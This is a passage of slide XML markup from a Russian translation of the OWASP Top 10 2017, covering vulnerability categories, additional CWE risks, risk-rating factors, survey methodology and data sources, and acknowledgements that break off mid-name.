                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Разглашение данных</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dirty="0">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A4:2017-Внеш. сущ-ти XML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25089">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A5:2017-Недостатки контроля доступа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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="8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77444">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sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A6:2017-Некорр. настр. безопасности</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439827">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A7:2017-Межсайтовое выполнение сценариев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A8:2017-Небезопасная десериализация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СЛОЖНО:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" b="1" baseline="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25089">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A9:2017-Уязвимые компоненты</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439827">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A10:2017-Недостатки</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU" sz="800">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>журналирования и мониторинга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СЛОЖНО:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" b="1" baseline="0" dirty="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516322734"/>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sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Дополнительные риски, требующие внимания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sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Помимо угроз, представленных в Топ-10, существуют другие риски, которые необходимо оценивать и учитывать. Некоторые из них уже описывались в прошлых версиях Топ-10, а некоторые — нет, включая новые техники атак, которые появляются постоянно. Ниже перечислены дополнительные угрозы безопасности приложений (по номеру CWE), на которые также необходимо обратить внимание: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4"/>
                        </a:rPr>
                        <a:t>CWE-352: Межсайтовая подмена запросов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5"/>
                        </a:rPr>
                        <a:t>CWE-400: Неконтролируемое использование ресурсов ("Чрезмерное потребление ресурсов", "Отказ в обслуживании приложения")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6"/>
                        </a:rPr>
                        <a:t>CWE-434: Отсутствие ограничений на загрузку файлов небезопасного типа</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7"/>
                        </a:rPr>
                        <a:t>CWE-451: Некорректное представление важной информации интерфейсом пользователя (Подмена интерфейса/курсора и прочее)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8"/>
                        </a:rPr>
                        <a:t>CWE-601: Перенаправление на небезопасный сайт ("Открытая переадресация")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9"/>
                        </a:rPr>
                        <a:t>CWE-799: Некорректное ограничение частоты взаимодействия (Противодействие автоматизации)</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0"/>
                        </a:rPr>
                        <a:t>CWE-829: Использование функций </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>недоверенных</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t> источников (Сторонний контент)</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1"/>
                        </a:rPr>
                        <a:t>CWE-918: Подмена запросов на стороне сервера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685772" y="2560973"/>
            <a:ext cx="1195708" cy="210827"/>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Распространенность</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3897232" y="2487484"/>
            <a:ext cx="1040475" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Сложность</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>обнаружения</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="800" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763815" y="2456765"/>
            <a:ext cx="895106"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Сложность</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="770" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>эксплуатации</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4899352" y="2540968"/>
            <a:ext cx="869908" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Технические</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1178750" y="2276746"/>
            <a:ext cx="4891542" cy="435747"/>
            <a:chOff x="384561" y="1049627"/>
            <a:chExt cx="5307569" cy="687591"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2635167" y="1055019"/>
              <a:ext cx="1073105" cy="381127"/>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sz="800" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Недостатки</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>безопасности</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endParaRPr lang="ru-RU" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="ru-RU" sz="770" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Векторы</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="770" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t/>
              </a:r>
              <a:br>
                <a:rPr lang="ru-RU" sz="770" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="ru-RU" sz="770" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>атак</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:endParaRPr lang="ru-RU"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4660790" y="1049627"/>
              <a:ext cx="1031340" cy="428656"/>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sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Последствия</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a:off x="3708272" y="1245583"/>
              <a:ext cx="952518" cy="1837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384561" y="1404706"/>
              <a:ext cx="690657" cy="332512"/>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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Источники</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="ru-RU" sz="770" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="ru-RU" sz="770" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>угроз</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="44" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="39" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2093993" y="1225350"/>
              <a:ext cx="541174" cy="20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281899" y="2231740"/>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815563" y="2442479"/>
            <a:ext cx="718782"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Для бизнеса</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+ФР</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titel 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>О факторах риска</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2237072728"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="987552"/>
          <a:ext cx="6858000" cy="820174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sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Обзор</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На саммите OWASP активные участники и члены сообщества приняли решение о представлении уязвимостей, двух перспективных классах уязвимостей, а также классификации уязвимостей на основе количественных и качественных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noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Отраслевые исследования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Для исследования были отобраны категории уязвимостей, которые ранее считались кандидатами или упоминались в отзывах на 2017 RC1 в списке рассылки Топ-10. Мы упорядочили эти данные и попросили сообщество выделить топ-четыре уязвимостей, которые стоит включить в Топ-10 OWASP 2017. Опрос проводился со 2 августа по 18 сентября 2017 г. Было получено 516 ответов, по которым определили критичность уязвимостей.</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Разглашение частной информации без сомнения является самой критичной уязвимостью, но она лишь дополняет существующую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A3:2017-Разглашение конфиденциальных данных</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Сюда же можно отнести уязвимости, связанные с шифрованием. Небезопасная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была третьей по данным опроса, поэтому после оценки ее опасности она была добавлена в Топ-10 в качестве категории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A8:2017-Небезопасная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Под четвертым номером шли уязвимости, связанные с ключами пользователей, и их включили в список в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A5:2017-Недостатки контроля доступа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Приятно видеть, что в ходе исследования высоко оценили важность этих уязвимостей, поскольку данных по ним не много. Пятыми в списке шли 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которые дополнили Топ-10 категорией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A10:2017-Недостатки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журналирования</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 и мониторинга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Настало время, когда приложение должно уметь определять атаки, регистрировать связанные с ними события, а также выводить предупреждения и реагировать на них.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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Открытый сбор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sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Традиционно, данные собирались и анализировались на основе частотности: сколько уязвимостей было обнаружено в приложениях. Известно, что автоматизированные средства сообщают обо всех фактах обнаружения одной и той же уязвимости, а специалисты — об обнаружении одной уязвимости, но в разных условиях. Поэтому при анализе сложно объединить два этих подхода.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>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Для версии 2017 коэффициент уязвимости рассчитывался на основе количества приложений, имеющих одну или более уязвимостей определенного типа. Большинство данных предоставлялось в двух вариантах: в традиционном частотном, с подсчетом всех фактов обнаружения уязвимости, и нетрадиционном, с подсчетом приложений, в которых уязвимость была обнаружена (один или более раз). Несмотря на несовершенство, этот подход позволяет сравнить данные, полученные специалистами с помощью специализированных средств, и данные, полученные специализированными средствами с участием специалистов. Необработанные данные и результаты анализа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8"/>
                        </a:rPr>
                        <a:t>доступны на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hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>GitHub</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Для будущих версий Топ-10 планируется создание дополнительной структуры, предназначенной для этих целей.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>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В ответ на призыв о сборе информации было получено 40+ комплектов данных. Большинство из них идентично полученным в ходе первоначального сбора (на основе частотного подхода), поэтому мы использовали данные только 23 источников, охватывающие ≈114 тыс. приложений. По возможности, брались данные за один год от одного источника. Большинство приложений являются уникальными, хотя есть вероятность повторения приложений в ежегодных данных от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Veracode</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Данные из 23 комплектов были поделены на полученные специалистами с помощью специальных средств и коэффициенты уязвимости, полученные с помощью инструментов с участием специалистов. Мы рассчитали процентное соотношение приложений, содержащих каждый тип уязвимости. Коэффициент уязвимости использовался для расчета распространенности при оценке опасности для определения критичности уязвимости в списке Топ-10.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sz="3500"/>
              <a:t>+МД</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Методология и данные</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="16" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1497875096"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="188640" y="2929390"/>
          <a:ext cx="6255695" cy="1237565"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="810090">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4835991">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="609614">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="225025">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Критичность</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Категории уязвимостей по данным исследования</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Оценка</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данных (Нарушение конфиденциальности)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с шифрованием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 недоверенных данных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8401">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Обход авторизации с использованием ключа пользователя (Небезопасные прямые ссылки на объекты* и Подмена пути)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и мониторинга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sz="3500"/>
              <a:t>+Б</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Благодарности</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 14"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1719085677"/>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sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Организации, предоставившие данные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dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Хотим поблагодарить организации, которые предоставили свои данные по уязвимостям для выпуска обновленной версии </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="8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8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a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="ru-RU"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sz="950" u="none" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Впервые все данные, предоставленные для выпуска Топ-10, а также полный список источников </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" u="none" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>доступны публично</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" u="none" baseline="0" dirty="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600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:uLnTx/>
                          <a:uFillTx/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Отдельные участники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950" u="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Хотим поблагодарить отдельных участников проекта, которые внесли ощутимый вклад в работу по созданию Топ-10 на </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" u="none" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>GitHub</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" u="none" dirty="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Также хотим поблагодарить всех, кто присылал свои отзывы через </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Твиттер</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, по электронной почте или каким-либо другим </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>способом</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a: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И конечно же мы хотим отметить </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Дирка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Веттера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Dirk</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Wetter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>), Джима </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Манико</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Jim</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Manico</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) и Осаму </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
